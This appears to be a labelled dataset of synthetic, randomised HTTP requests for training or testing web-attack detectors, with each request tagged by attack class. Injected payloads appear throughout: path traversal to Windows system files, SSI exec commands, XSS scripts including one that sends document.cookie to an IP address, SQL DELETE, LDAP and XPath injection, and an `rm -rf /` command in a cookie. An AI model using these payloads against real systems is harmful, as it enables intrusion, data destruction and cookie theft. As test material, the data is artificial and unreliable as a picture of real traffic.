GET /ecehlu/oBrMV5S2vwWZr/frtdS4ysjhlsnb.msf?2u4iatgnnsa=rfconnectn&sttttihosmoh9l3=%29g%7E&rRtt6zfii1j=onhsRa5&sap=533&t2d9mrra=594524&tAL=me&isitSme=55TEhSCiah&dnrzdrghqb=959&es8gtote0el=%29++%28%7C+++%28displayName%3Dhad*%29+++%28name++++%3D+had*%29%28++++mail%3Dhad*++++%29 HTTP/1.1
Host: www.aoxnxszs.de
Connection: i26a
Accept: image/jpeg;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: B818urd-v29gcra
Cache-Control: arftfei='E61abr7c'
Client-ip: 32.153.101.139
Cookie: a5eorlare9t5di=( syoc[mhm;PjhUZconnectjJservices0z=tu;Ahaving4R=e4-lwSeertka;cselu5=9802822;ai3R=eaoawdtltlrycoi;lmjMbewt=o
Cookie2: $Version="157"
Date: Wed, 13 Oct 04 04:42:06 UTC
ETag: "6VMRtb69XJ0f1UoX"
Expect: 4taRX=risno5L4
From: 8nlhbept@3gle.ch
If-Modified-Since: Sat, 26 Aug 06 22:30:39 GMT
If-Unmodified-Since: Sun, 13 Jan 08 22:09:00 UTC
If-Match: *
If-None-Match: "uI51bWvgZETqHrN68"
If-Range: Sat, 06 Mar 04 13:42:52 CET
Max-Forwards: 522
MIME-Version: 8.2
Pragma: oteoit='rauSr'
Proxy-Authorization: ziaee2 vttV0aet=bileft6
Authorization: Basic Y2RvOGF0NG46aXN6Y2lF
Range: 663102-
Referer: http://ndsJoerf.ch/WerT.jpg
TE: trailers
Trailer: If-Modified-Since
User-Agent: eOnar (eTByT.H@; muLg6ad; nJAZcO; eOAh3ZJ; mQOYyrquvT)
UA-CPU: Sparc
UA-Disp: 2707,126,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 427x816
Via: FTP/4.6 129.247.36.140
Transfer-Encoding: gzip
Upgrade: aol/0.7, dxme/6.7, otfplt/6.5
Warning: 871 35.130.69.56 "hdEagaRnal3ae" 
X-Forwarded-For: 195.229.142.172
X-Serial-Number: 94095568311644
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38022
Start - Id: 45977
class: PathTransversal
POST /vXvC/dJOtPgroup byC/rt8odbemagBtOneemjrg/7NQOlY/tqEXYxPIxCpo@Oiyu/n5AHs/de/x1rmeariecshScstyso2/rRMl4uBDreNVxZICjY/xFQGKC58u26owget1H.jsp? HTTP/1.1
Content-Length: 134
Content-Language: a7F5atr,asm
Content-Encoding: identity
Content-Location: http://www.eRhchz.biz/aaei.zip
Content-MD5: YThlYWV5d3VyaUVhbGNjYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Aug 08 22:54:00 GMT
Last-Modified: Mon, 23 Jan 06 09:31:22 UTC
Host: 249.103.210.49:80
Connection: keep-alive
Accept: video/mpeg, image/png
Accept-Charset: iso-8859-4, utf-8
Accept-Encoding: *;q=0.2
Accept-Language: ../../../../../../WINNT/autoexec.bat
Cache-Control: no-transform
Client-ip: 151.169.171.65
Cookie: hKihdnx=6;nghs= h;p9motrn=dr5ovgcSraajyoosoe;smaonbEl6dntnd=suthi
Cookie2: $Version="0"
Date: Wed, 17 Mar 04 15:44:43 UTC
ETag: W/"I6Z0ysyfi9upk5OXhCH"
Expect: rrenkaih
From: ubSynrd@jJdge.it
If-Modified-Since: Tue, 03 Nov 09 08:00:55 UTC
If-Unmodified-Since: Mon, 12 Oct 09 15:12:38 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 08 May 06 23:51:59 CET
Max-Forwards: 8
MIME-Version: 2.1
Pragma: ewo='zodem'
Proxy-Authorization: s8m7 sweOt=darauoem
Authorization: srey rlvl=csuswita
Range: 1614-89,75-
Referer: http://aopie9.com/wzpeLr/twraeN1/HnooEtq.txt
TE: deflate;q=0.3,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/5.8 (compatible; MSIE 5.9; Mac OS X; mntwk; lmr8dueegk)
UA-CPU: StrongARM
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 548x253
Via: 5.5 www.m8pem.png, FTP/5.1 30.195.176.18, 2ns/8.9 www.azhrr.gif
Transfer-Encoding: compress
Upgrade: jxtbt/1.6, rh2ots/7.7, adgQ/3.8
Warning: 338 134.95.42.95 "lbocbuwzwise1Nry" 
X-Forwarded-For: 87.224.179.54
X-Serial-Number: 41893725708385200236
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

t0e0ccrtdsF=0428337&d3a=57&T3linkvr1metaini=55748697&neOu1eyl=Ra\mbts0snbSa&lpl=i&ptf7=715709&Goeueavi702cs=iizDavdK48i&3hc=dHaeqern

End - Id: 45977
Start - Id: 40718
class: SSI
POST /dpg8nsTsarp77eiFDet9/DclenMettlcs/riFMeiP@@G/anlhaelf/soonartipeRsErisn.sh? HTTP/1.1
Content-Length: 23
Content-Language: rp,smsewy
Content-Encoding: compress
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 23 Oct 04 11:18:14 UTC
Host: 180.228.170.182:51
Connection: 2i4c
Accept: */*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.8
Accept-Language: 2x-ehasiit, reemasae-lfkco;q=0.3, uc4y-in4a5sea, nent-xlm;q=0.8
Cache-Control: no-store
Cookie: utaesri=<!--    #include    virtual="c:\winnt\system.ini"     -->;oaSoojhndceru=5
Date: Sun, 27 Sep 09 12:45:15 UTC
ETag: W/"l..X3tzb4@fRK3hyg"
From: set8@tsrHetco.ch
If-Match: *
Max-Forwards: 0573
Referer: /rsper/avNesn/lthto/zshhim.mpeg
User-Agent: yztLE-MT.a http://www.ymtdph.st
Transfer-Encoding: compress
Upgrade: cos/7.6

fhe=mEec8ht&Tuanebt=Ybo

End - Id: 40718
Start - Id: 40352
class: SSI
POST /pNsgUx.jpeg? HTTP/1.1
Content-Length: 12
Content-Language: sir4i1,Eunccnic
Content-Encoding: gzip
Content-Location: /wlaou/lyasos.txt
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 29 Aug 05 19:56:16 CET
Host: www.Nxlgdaunuu.uk:0
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.7
Accept-Language: stmTtAh-eli5e, t-7meD
Cookie: eies3ote3s=-rslA gncus[cietthgw$;Wihlnnro2mrn7l6=rvpgeDNp;hefhrecieNhwd=02275;ernaocatsrauotn=Een\n/ seii meta idtPe;MwinntJNnqSmS=<!-- #exec cmd="c:\progra~1\aatv\NrTtxetine\thahim.exe   d:\brh\www.arilistiol.org\cujswnk\database.mdb   /x    exporttofoxpro"-->;la1rNpbtrg=Baefaomdilh
Date: Tue, 22 Apr 08 20:18:44 CET
If-None-Match: "O0xRd7pkaSpqYvPqh@D"
If-Range: *
MIME-Version: 6.2
Referer: /Rlvi/ennrbou/iti6eaaa/c6edune.dll
User-Agent: tmvl@rvB7 http://www.Enwa.ch

otrdajqAo2=5

End - Id: 40352
Start - Id: 47931
class: XSS
GET /aK00/NzoA3yftjtxev0judra/0xRCCBmrzQ/hmdmhndtse3nofelrAd.jsp?ett=d6L7&tA2e5cmdohD=tdm8nsemerdbohta&hTehelkdeEj=Iit3a+%5Denranu&rlawddsoeNitmn=62798980&6oevalQz@XtXbP_=xae&iet5ainceei8na=bZ962Jjuf&GwyUGeb4RNl3=eo2rousad&uRuyfteicoxy4ee=tyetpinnhhgssbfz&el11oaad=i&RR0cfp=86906&htaccesnZ.mU=369054&7tnt=trRdMhOc&It6nxi=y%2B&UBpS6=%3Cxml++id+%3D++++%22++++X%22+++%3E%3Ca++%3E%3Cb+%3E%26lt%3Bscript+%3E%5Balert++++%28%27Bremle7arr%27%29%3B%5D%26lt%3B%2Fscript++%3E%3B%3C%2Fb+++%3E%3C%2Fa%3E%3C%2Fxml++%3E&rte=n%3De9 HTTP/1.0
Host: www.igxpsI7.gov
Connection: keep-alive
Accept: text/*, video/quicktime
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: Tul-f, hdjQticf-os
Cache-Control: max-stale
Client-ip: 194.3.251.41
Cookie: sRI1sert=seFVS;tcmA=axhhrdstepnrtxc
Cookie2: $Version="613"
Date: Sun, 31 Oct 04 01:22:46 CET
ETag: W/"zaALvGTogQK3DnCL5"
Expect: on3be5=iadbe;seabhe=eetaKcek
From: T5cc@hrqtf.uk
If-Modified-Since: Sat, 26 May 07 06:43:28 CET
If-Unmodified-Since: Thu, 11 Jan 07 12:27:58 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 07 Aug 07 01:36:24 UTC
Max-Forwards: 5120
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: xm5Eoo cesOKwc=keom4
Authorization: NTLM ZWUxYXpEMm5kN3JsZWVlSWM5N210OWlpZ3NvZWQwb3BSd2lr
Range: -6
Referer: /3ee5sfdn/2oot.tar
TE: trailers,gzip;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/0.8 (Machintosh; U; PPC Mac OS X 9.1; 6y-tp; rv:1.5.4) Gecko/31360400
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 229x467
Via: 9.9 217.215.191.236:77772, 21dee/5.3 www.mhaqwte.jpeg
Transfer-Encoding: deflate
Upgrade: rmhmkL/0.0, a6ssth/8.0, pto/4.4, edcoWe/0.0
Warning: 074 www.lhduar.css "seste7nmh6" "Tue, 21 Sep 04 11:27:26 UTC"
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 03181480810
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47931
Start - Id: 42637
class: SqlInjection
GET /JlfLL/eFjVwh-go/RnLord7a/hDPeQCcBE3-vb/tel3D9dizY_/zyijd/sf8TEcZJt@qcZ_.mdb?Yostmti=u1WAf6I&teo3xjtipdor=8218305&isesSeuhcoIlph=21314&eetphl=boot.inixterm%29sfptamochaOkcn9Rtameta&54oa=liauseayss&hrn=0tqZleeae1eoeesr&oYEO5fXL6IV=wkl4nlq%27%29%3BDELETEFROMusersWHEREupper%28username%29+%3D++upper%28+%27admin&em3ookpa=ohqZcr4TJTi&a2x6ibswtEoob=75&WYecho4NPnR1xn=Hnn&dlntnjli3riim=se&bbnrn=hb HTTP/1.0
Host: 3.59.173.115:40314
Connection: sdaHi
Accept: */*
Accept-Charset: windows-1251;q=0.3, iso-2022-jp;q=0.1, iso-2022-kr;q=0.0, utf-7;q=0.0, x-mac-greek
Accept-Encoding: *;q=0.2
Accept-Language: 8-8hcuwcs, aeuss0-ne9oi, ailn-hzLE;q=0.6
Cache-Control: no-transform
Client-ip: 107.228.29.96
Cookie: Nchheoa=zessin;7CZPdeleteF=6e7os;JKBR=siMtk
Cookie2: $Version="26"
Date: Wed, 03 Mar 10 07:01:30 CET
ETag: "w8Zou2YQekyqpbQNzJ"
Expect: 100-continue
From: gotca@lpobi9rhDa.org
If-Modified-Since: Fri, 09 Sep 05 18:28:45 CET
If-Unmodified-Since: Mon, 09 Aug 04 22:26:17 GMT
If-Match: "GDnsZ-T4oXz66QlP"
If-None-Match: *
If-Range: Sat, 19 Nov 05 17:56:43 CET
Max-Forwards: 1
MIME-Version: 3.2
Pragma: o='ta4EoA'
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: NTLM OTFveGhqbGFlMHRvb2FkaXJPY3NxOG1zdGFmM3Rzam5SdmU=
Range: 72326-9838
Referer: /sir6/DutNf/isqha/nSx6e.php4
TE: gzip,trailers,deflate;q=0.3
Trailer: Warning
User-Agent: mzfct (eJVhkvzRjB)
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4720x346
Via: 0.0 185.152.146.141:3
Transfer-Encoding: deflate
Upgrade: aewi9/5.5, sfsc/6.0, tiEao/8.7
Warning: 162 www.tgbma.css:1 "eWemetp9erNow3n" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 81024686129
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42637
Start - Id: 38915
class: LdapInjection
GET /ir/7s.swf?tufslrctlryiT1=esssugEOo4rishle1&iDsoses=rAeM_C&ouqi9arpnb=Hdoh2a7tmeih&eik7rER-=sd&iaAisInnt5ne=%7Cf&snmhUr=thoat&8admin39h3tmpj6eY=ners8aele9ieaa&oo4nGqGnh=se+%24&oe5=teorstdina&m5Stcrlrasest2=cs%29%28%26%28objectClass+%3D+++Cxle*%29 HTTP/1.1
Host: www.li8za.cz
Connection: keep-alive
Accept: application/*;q=0.1, image/gif;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: eah-9moyne;q=0.0, uetai-rru;q=0.2, tsd-8u7;q=0.5, u1nv-asogF;q=0.7
Cache-Control: min-fresh=90431
Client-ip: 200.72.166.1
Cookie: eEsuXeoesme= mtmw|:hTnttT;ssibeyw=sFtmp;Lpr4i=hrl]h
Cookie2: $Version="45"
Date: Wed, 30 Aug 06 17:18:39 UTC
ETag: W/"E8jHF1YpjxHTbtDDxA"
Expect: 100-continue
From: 0behbt@re7t77.uk
If-Modified-Since: Mon, 02 Jun 08 13:29:09 GMT
If-Unmodified-Since: Wed, 18 Jan 06 21:07:27 GMT
If-Match: "tPJS-._P.Hq9OBZvSK"
If-None-Match: "mxpBaSZlNMBvj9Xhe8h@"
If-Range: "rMCEEPNZJUo41oqT0GgM"
Max-Forwards: 25
MIME-Version: 7.2
Pragma: rqnet=n2rk
Proxy-Authorization: 3h2se aosE=ainerp3e
Authorization: hgeet tYei=R5lh
Range: 979-,2-1
Referer: /thr7olie/ytit/ebshaaig.jpeg
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/0.5 (Machintosh; U; Mac OS X 3.4; xm-ey; rv:6.7.0) Gecko/94377417
UA-Disp: 518,9521,8
UA-OS: Win95
UA-Pixels: 1628x672
Via: 6.7 113.233.112.39:36875, FTP/1.4 www.fcercqe.css
Transfer-Encoding: gzip
Upgrade: toues/6.2, Lrne/8.5, oec5E/9.4, eyhe/5.1, eneaoo/3.9
Warning: 695 www.5pter.js "oYstrefhsreaowhenept" 
X-Forwarded-For: 53.112.199.132
X-Serial-Number: 498357729
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38915
Start - Id: 46823
class: XSS
PUT /yWSK13eBQlCi5KIt/x9sh/pIyp@yf0.i4/itBpIa0Modnrxi9ean9/bWll/nxtbcoa9ep/KRUtrhZYstyleUt17/iECR8bliqH5auyQ@Ymr/8n5jsgTpconnectx0/7hoHr6/U5Cx.asp? HTTP/1.1
Content-Length: 399
Content-Language: jehWLd,yIlchiL,asn
Content-Encoding: compress
Content-Location: http://www.28oessyg.ch/8y5sie/rnmn/fnrolsI/fsadei.txt
Content-MD5: ckE3b2xpZW1hdG1pZXJtbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 25 Apr 09 15:36:40 UTC
Last-Modified: Sat, 15 Dec 07 21:22:41 UTC
Host: 133.87.14.97
Connection: rzotDRIr
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 20.57.50.84
Cookie: en0nsnztva=dwu2eqs77r;after7xcct2sBs=13704;cpthQiitsuot61s=nc@httpshm;egaidReiadeaweb=b'n%un;1aZWsservices9=7413
Cookie2: $Version="9"
Date: Sat, 08 Apr 06 09:08:08 UTC
ETag: W/"CE44HJExLHf9qTC"
Expect: 100-continue
From: gUtdmw@nhajiIe.be
If-Modified-Since: Sun, 04 Jan 09 23:33:17 GMT
If-Unmodified-Since: Thu, 25 Sep 08 15:20:57 CET
If-Match: "UX8X8CcOtW5iCLhIO2"
If-None-Match: *
If-Range: Mon, 06 Aug 07 18:58:30 GMT
Max-Forwards: 87
MIME-Version: 8.3
Pragma: twimeth='dso'
Proxy-Authorization: Digest cnonce="dGncrnt"
Authorization: NTLM ZVVyZTYwaWZzM2VlaW9ycm1IZm5zZW90bTRDaHMyaDd1
Range: 0-
Referer: /iCdBeF/qezc.php4
TE: chunked;q=0.6
Trailer: If-None-Match
User-Agent: Mozilla/7.4 (X11; U; Unix 5.8; ul-M9; rv:4.6.0) Gecko/32938840
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: 3.1 26.106.2.244, 4.5 www.h3zycsns.html, 7.9 www.nyial4m.html
Transfer-Encoding: deflate
Upgrade: dmhn/6.6, j0orh/4.6
Warning: 012 66.34.17.105 "buyInnrnE" 
X-Forwarded-For: 90.185.191.90
X-Serial-Number: 80684101
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

if=saeIkatha&oThbhnsodp8i=4477512929&pinputeB8cFk1L3n=sZM5tZZh&on0hoepernqtec=psetes&pOWSautoexecR2EinputLIs=s  rncsxtometa2&nesDacehfseeuR=Sh&olxNksreash=3&2itSgrh3=oTe msameunion twue$&9QRautoexecNSUzE=rmIpn%ogwbid1re31iframe&eegnhc3Npw67Lt=2626773&li6eaco7iir=k@ttdiv&csesteo2aL=g|tectvnGRh&ktgSfh=i3rnueeois&raxoe1=&<script    >[alert   ('trioE');]</script    >

End - Id: 46823
Start - Id: 48255
class: XSS
PUT /hRlSe@Ifn/hnmaBgaasodi/3zImeeaouwnitsdNxeen/pmlhpeanoST/YVUXEctmpGe2n.sh? HTTP/1.1
Content-Length: 254
Content-Language: 2ietee6,AzR
Content-Encoding: deflate
Content-Location: /creben/drtbxr/e82w/7Oaeyo4.cgi
Content-MD5: dHI4ZEVlbGlueXVzdGFpZw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 01 Dec 06 19:37:18 CET
Last-Modified: Sun, 25 Apr 10 24:43:13 GMT
Host: www.uNEs3ayYi.gov
Connection: keep-alive
Accept: video/mpeg;q=0.4, image/png;q=0.6, text/*;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=69483
Client-ip: 103.189.198.113
Cookie: redneaedr=2nhtc;ele=3225675;a89sln=ad;N0oldrfhken=<a href  =  "    javas&#99;ript&#35;[window.open('http://195.169.32.93/leittr.aspx'+document.cookie);]     "    >
Cookie2: $Version="2"
Date: Thu, 18 Jun 09 02:14:05 UTC
ETag: "GyRoO6woP65L5RNAnX"
Expect: 100-continue
From: oslKrae@1ok4xdre.uk
If-Modified-Since: Fri, 26 Jan 07 13:26:41 CET
If-Unmodified-Since: Sat, 10 Apr 04 02:26:39 UTC
If-Match: *
If-None-Match: "Xb6SCoEGsdpCE0Se26"
If-Range: Tue, 22 Feb 05 14:39:25 CET
Max-Forwards: 8
MIME-Version: 7.1
Pragma: e='zhyad5ih'
Proxy-Authorization: NTLM ZUllc2VkZWhiY2l3MG40c09IdGhhaGVzNnlIYW1pNm85cmRhaWtu
Authorization: pthi nnai4l=Honcoon
Range: 9-39,892590-
Referer: /ohtyeptc/eAweUdjt/s1vlt/aeeto.zip
TE: gzip;q=0.6,trailers,gzip;q=0.8
Trailer: If-Unmodified-Since
User-Agent: lOhad650idrt4
UA-CPU: 68000
UA-Disp: 344,654,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 9341x017
Via: 4.4 0.153.135.105, HTTP/0.2 178.10.248.172:61413
Transfer-Encoding: identity
Upgrade: eiasuu/6.0, RWCx/1.2, yeae/8.9, aaarsr/5.3
Warning: 342 173.97.45.171 "uivI8e2ePc" "Sat, 10 Mar 07 19:18:29 GMT"
X-Forwarded-For: 233.95.8.172
X-Serial-Number: 73408
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3Uqgrb=2706&-jHOMwjuidq=237&r8eceinmng6omm=+e;Atfzony%v0anfl&WFD@0lV=wprocessing-instructionform~;qnesdtead3tvag&y3parnrantmrN=Oaj&qkutox=olee>nodexml|einph-Ae/t:&U2B2=2936920&eOpditEmrdaE5sg=630923&pddw=rhfb5d&ettsiof5lst1i=iCWv3Gc3s8R

End - Id: 48255
Start - Id: 42963
class: OsCommanding
GET /ucUe@Eo/lnoindsmoicbesrgoa/3XxKkBgYJF/fS-@passthrud7G/gEpOH4Ylyf-/17/vzMunionMJ5M/n66sot/sNUDVt_18ZC6e3F3/fQJ.B/ljQFWF/kL5JhlTCiHk-Z.asp?4le1l=3&i5oie84eRd=oobh.0FY&1raemttoe=120809 HTTP/1.1
Host: www.6dac.biz
Connection: keep-alive
Accept: audio/*, video/mpeg
Accept-Charset: iso-2022-jp
Accept-Encoding: gzip, deflate;q=0.5
Accept-Language: e-v, atNrbAtm-oesth, uclvaG-m;q=0.1, sronit-s;q=0.6, c1-vme
Cache-Control: no-cache
Client-ip: 162.231.56.83
Cookie: Na2otoiracee=250;haljnteNNobs=`  rm  -rf   /    `
Cookie2: $Version="940"
Date: Tue, 11 Jul 06 02:09:49 UTC
ETag: W/"mg6-z5rmN_exu3fsjr"
Expect: 100-continue
From: aaoq@n8t5el2e.org
If-Modified-Since: Thu, 02 Apr 09 19:54:15 UTC
If-Unmodified-Since: Wed, 26 May 04 15:44:35 CET
If-Match: "PXkTobc6REBH_j0n"
If-None-Match: "@UsSjeumr3ha.y3iml"
If-Range: *
Max-Forwards: 645
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Iosh iioNe11A=5tlqHb
Authorization: uogke 5Nbtnlue=oeranei
Referer: http://ijc9tt.fr/8oenh/mei6/taDe/nfwtn/rt4onsrt.swf
TE: trailers,deflate;q=0.7
User-Agent: Mozilla/8.1 (Machintosh; U; PPC 4.5; ls-sO; rv:1.3.8) Gecko/59603049
UA-Disp: 8981,079,32
Via: 0.7 161.227.106.191, 4.0 194.227.27.237, diE/2.5 32.154.99.172
Transfer-Encoding: wkasSe; ebl5h=airH
X-Forwarded-For: 145.166.242.21
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42963
Start - Id: 49554
class: XPathInjection
GET /e5e9brfcxeinmrjdgot/evhTb91Ha3H2C.php3?miT=qer%27++or+++++count%28++++path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28++++i+%2B++++j+%2Bk+%2Bl+%2B++++1%29%5D++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+%27ineottT%27%3D++%27++++ietnure%27+++++or&eegav5ieNsa=ou+sdbin0nb%7C%2F-fabaccess_logioa%3C&idhT3puaobcmica=15&8oie37oerbfatc=4273594&neX4l=243796&rrici1tmgs=s.VivXejOrP%40 HTTP/1.1
Host: 22.67.3.80
Connection: close
Accept: */*;q=0.5
Accept-Charset: x-mac-chinesetrad, x-mac-icelandic;q=0.0, utf-8, windows-1253
Accept-Encoding: 
Accept-Language: lbe-brN, Dajmeu-tiuhb;q=0.1, asbstE9-sr2so9j9;q=0.7, iiwotai-uluemoN, u-ias6t
Cache-Control: no-cache
Client-ip: 86.253.108.205
Cookie: 3eadcrsn7A=hA6vFNwyaIw;ise=1f
Cookie2: $Version="6"
Date: Mon, 20 Mar 06 05:30:49 GMT
ETag: "XzC6Z-Vy8j2n97GIJ"
Expect: 100-continue
From: petnihea@07eei4h.cz
If-Modified-Since: Wed, 14 Jan 04 04:23:02 GMT
If-Unmodified-Since: Wed, 19 Mar 08 03:56:21 GMT
If-Match: "s@hhRfZUMmhLWXVTudU8"
If-None-Match: "d-qWUxlwVnuXRcFaAz"
If-Range: "E7_PANFcf5TzthpGJX"
Max-Forwards: 6
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Digest username="93es"
Authorization: NTLM YWVvdW4xYmhOckVjZWFyNnR0dWNjbU9saW9oOGdpY2dhbndw
Range: -044
Referer: /ean1eac/aontlddL/itdm/Osgss.gz
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/7.5 (X11; U; SunOS sun4u 1.9; to-es; rv:4.1.7) Gecko/80542524
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9192x115
Via: 7.6 140.147.124.7, 2.3 198.92.1.187, 5.7 www.rmatk.jpeg
Transfer-Encoding: deflate
Upgrade: 0ba/9.3, efdwri/1.0, tlso/8.2, tVzp/3.0
Warning: 622 40.205.215.175:58 "enti0naeoeboeeo" 
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 5171892279457940
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49554
Start - Id: 48470
class: XPathInjection
GET /dsrtu0dbmplt4des/b2Annni31l7/laiiotbame0tuAzT/hzjprY/denhgeewsnralme/wG.4binAFvS@LD/hyroq1ysn.jsp?SffTan=8&aerdar=rreplacer5duaedsqe&nnweIbbOeiev=0 HTTP/1.0
Host: www.ir7tclh7.st
Connection: o6tfEsc8
Accept: video/*
Accept-Charset: hz-gb-2312;q=0.8, x-mac-hebrew;q=0.1, windows-1254;q=0.8, isiri-3342;q=0.8, x-mac-arabic
Accept-Encoding: *
Accept-Language: ad3Ckc-z95ieogL;q=0.2, tUwf8r-fm, cn-rGOosai;q=0.4
Cache-Control: no-transform
Client-ip: 193.145.9.182
Cookie: nttaoaae84=nsxs'  or     count(path/child::node()[position(    )=((    i  + j+  k +   l +   1)] |  path/child::*()[position()=(k+1)])=1    or 'mlrdev' ='    ntnLwiah'  or;tcetsaeiJ=ihiEsatcerfNo5m;onbe3pxelcee33=56445342;pdrwgermolfstm=467799818;iisek=515463
Cookie2: $Version="1"
Date: Tue, 29 Jun 04 11:35:42 CET
ETag: W/"FKKTnXS@BEreAWkUH-iT"
Expect: 100-continue
From: duez@roBpoamoii.uk
If-Modified-Since: Sun, 04 Jun 06 17:45:19 GMT
If-Unmodified-Since: Wed, 03 Mar 04 14:16:08 UTC
If-Match: *
If-None-Match: "rX9Uu33fGVma-MUUs0"
If-Range: Mon, 26 Apr 04 15:49:11 UTC
Max-Forwards: 703
Pragma: pmn=t0rfg
Proxy-Authorization: 7vto beGCh6=td7mup
Authorization: NTLM cmM2aXR5bkV3dGV0aWE2b25BcmkwbXpub2V0bmhhVGVlbGlIdGVtYWVuYWJo
Range: -8,000319-4,-57
Referer: /oeegXntE.tar
TE: chunked,trailers
Trailer: If-None-Match
User-Agent: aayrsE4b8Uyreteoe
UA-CPU: Sparc
UA-Disp: 4596,7427,16
UA-Color: color8
Via: 2.4 www.t3egd.png
Transfer-Encoding: compress
Upgrade: eeet1/3.4, has/9.2, C8nt2/1.3, wNsh/5.4
Warning: 216 www.neaatkhh.jpeg:6 "hacliae" 
X-Serial-Number: 60467521583413658
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48470
Start - Id: 45670
class: PathTransversal
GET /pe/eqhTcn0cvTrjtsdt.php?etntohleea8aeh=2Coic8%5D+2oacks&koct=55735&ond3suufei=ji&okb3sbd6t=5826892&2lgdia8=LEhoehmcneEi5open&R58ssen5=nirbhtpass&rl7m=..........................WINNTsystem.ini&i4J73ino=nbalikerdocument1rwle&connectVgIE=2yPyjUCLc6&r7nc8=39575&aXvobjectM2Nmail5dlsin=37645377&emku=a%404ZQi3V4Z&kg9juh3=lDr&leoavm1dve=fnsd3ereotse HTTP/1.1
Host: 117.235.27.157:80
Connection: close
Accept: image/gif, application/zip, application/*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: o3se9-Wdtlo;q=0.1, omohkw9-es6co3t, airhs-8tzm
Cache-Control: no-transform
Client-ip: 10.24.0.201
Cookie: 3zoiebpoxenN6=7014214;nuudtnjllh=pl+n;tRhseu4tiUi=463;ttihla01l7=ye5-aia]etd
Cookie2: $Version="823"
Date: Sun, 09 Mar 08 13:10:09 CET
ETag: W/"tX@AS.xg2TCYBvC8FMx"
Expect: 100-continue
From: nerbc@c9tot8nhs.cz
If-Modified-Since: Thu, 28 Jul 05 03:06:51 UTC
If-Unmodified-Since: Mon, 19 Apr 10 09:44:19 CET
If-Match: *
If-None-Match: "bDGk7z1JyoB-94-G"
If-Range: "bGleP.UdyMUqXecdXiZ"
Max-Forwards: 3
MIME-Version: 4.5
Pragma: aest=aaposa
Proxy-Authorization: Digest cnonce="vhio"
Authorization: Basic NXRuODlsbTpGamkycjA=
Range: -62,101-,55-837
Referer: /iseosheo/sc76neT/nia1n/niewrw/orel.pdf
TE: chunked;q=0.7,trailers
Trailer: User-Agent
User-Agent: Mozilla/0.2 (compatible; oanrqlo; Win98; lkcexicr; xeteheih)
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 488x430
Via: FTP/7.1 240.186.209.6, FTP/5.9 www.teitf.tiff
Transfer-Encoding: 09ej
Upgrade: au3/0.3, DRlrd/5.7
Warning: 203 www.aloLt.js "tecu06" "Sun, 07 Mar 04 20:34:54 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: ----------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 45670
Start - Id: 42462
class: SqlInjection
